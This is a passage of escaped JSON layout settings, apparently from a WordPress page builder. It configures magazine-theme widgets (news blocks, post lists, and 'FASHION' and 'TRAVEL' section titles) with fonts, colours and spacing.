unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"use_read\":\"on\",\"typhography_read_color\":\"#f1f1f1\",\"typhography_read_hov_color\":\"#f1f1f1\",\"read_font_size\":{\"unit\":\"px\",\"size\":16},\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight\":\"400\",\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"use_icon\":\"on\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"#61c436\",\"post_icon_color2\":\"#007AFE\",\"post_icon_size\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_use\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size\":{\"unit\":\"px\",\"size\":25},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"animate\":\"fade in\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"\",\"category\":[\"7\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"section_magzma_main_news_post_control\":\"\",\"image_overlay\":\"rgba(0,0,0,0.3)\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"text_align\":\"\",\"text_align_tablet\":\"\",\"text_align_mobile\":\"\",\"width\":\"300\",\"height\":\"250\",\"love_count\":\"on\",\"love_count_color\":\"#ffffff\",\"love_count_hov_color\":\"#ffffff\",\"use_category\":\"on\",\"category_title_color\":\"#ffffff\",\"category_title_hover_color\":\"#ffffff\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"use_title\":\"on\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size\":{\"unit\":\"px\",\"size\":22},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight\":\"400\",\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_date\":\"on\",\"typhography_date_color\":\"#f1f1f1\",\"typhography_date_hov_color\":\"#f1f1f1\",\"date_font_size\":{\"unit\":\"px\",\"size\":14},\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight\":\"400\",\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"use_read\":\"on\",\"typhography_read_color\":\"#f1f1f1\",\"typhography_read_hov_color\":\"#f1f1f1\",\"read_font_size\":{\"unit\":\"px\",\"size\":16},\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight\":\"400\",\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"use_icon\":\"on\",\"post_icon_color\":\"#ffffff\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"0\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_use\":\"\",\"horizontal_col_select\":\"column-1\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"\",\"padding_size\":{\"unit\":\"px\",\"size\":25},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"animate\":\"fade in\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"stretch_section\":\"\",\"layout\":\"boxed\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"height\":\"default\",\"custom_height\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"20\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"65.004\",\"_column_size\":50,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"7pepaj8\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"7\",\"the_title\":\"FASHION\",\"title_size\":\"h4\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"400\",\"typography_title_text_transform\":\"\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#61c436\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e5e5e5\",\"text_bg_color_7\":\"#c9975f\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"},{\"id\":\"4lwlyjm\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"6\",\"offset\":\"\",\"category\":[\"4\"],\"orderby\":\"date\",\"metakey\":\"Views\",\"use_infinite_scroll\":\"\",\"loop_infinite_class\":\"loop-infinte-list-5\",\"section_magzma_post_list_5_post_control\":\"\",\"width\":\"\",\"height\":\"\",\"border_hover_color\":\"#c9975f\",\"use_shadow\":\"use\",\"use_category\":\"on\",\"category_title_color\":\"#c9975f\",\"category_title_hov_color\":\"#c9975f\",\"category_line_height\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"category_font_size\":{\"unit\":\"px\",\"size\":16},\"category_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"category_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"category_font_weight\":\"500\",\"category_font_weight_tablet\":\"500\",\"category_font_weight_mobile\":\"500\",\"use_title\":\"on\",\"typhography_title_color\":\"#000000\",\"typhography_title_hov_color\":\"#aaaaaa\",\"title_line_height\":{\"unit\":\"em\",\"size\":1.25},\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"title_font_size\":{\"unit\":\"px\",\"size\":\"16\"},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"title_font_weight\":\"600\",\"title_font_weight_tablet\":\"600\",\"title_font_weight_mobile\":\"600\",\"title_min_height\":\"\",\"title_min_height_tablet\":\"\",\"title_min_height_mobile\":\"\",\"use_excerpt\":\"\",\"excerpt_value\":\"10\",\"typhography_excerpt_color\":\"rgba(0,0,0,0.7)\",\"excerpt_line_height\":{\"unit\":\"em\",\"size\":1.5},\"excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"excerpt1_font_size\":{\"unit\":\"px\",\"size\":18},\"excerpt1_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"excerpt1_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"excerpt_font_weight\":\"400\",\"excerpt_font_weight_tablet\":\"400\",\"excerpt_font_weight_mobile\":\"400\",\"use_comment\":\"on\",\"typhography_comment_color\":\"#c9975f\",\"typhography_comment_hov_color\":\"#c9975f\",\"comment_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"comment_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"comment_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"comment_font_size\":{\"unit\":\"px\",\"size\":\"12\"},\"comment_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"comment_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"comment_font_weight\":\"400\",\"comment_font_weight_tablet\":\"400\",\"comment_font_weight_mobile\":\"400\",\"use_button\":\"on\",\"button_color\":\"#000000\",\"button_hover_color\":\"#c9975f\",\"button_line_height\":{\"unit\":\"em\",\"size\":1.5},\"button_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"button_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"button_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"button_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"button_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"button_font_weight\":\"500\",\"button_font_weight_tablet\":\"500\",\"button_font_weight_mobile\":\"500\",\"section_magzma_column_control\":\"\",\"margin_bottom\":\"20\",\"horizontal_use\":\"left\",\"horizontal_col_select\":\"column-3\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"animetime\":\"0.1\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-5\"},{\"id\":\"mkgirdt\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"7\",\"the_title\":\"TRAVEL\",\"title_size\":\"h4\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"400\",\"typography_title_text_transform\":\"\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#61c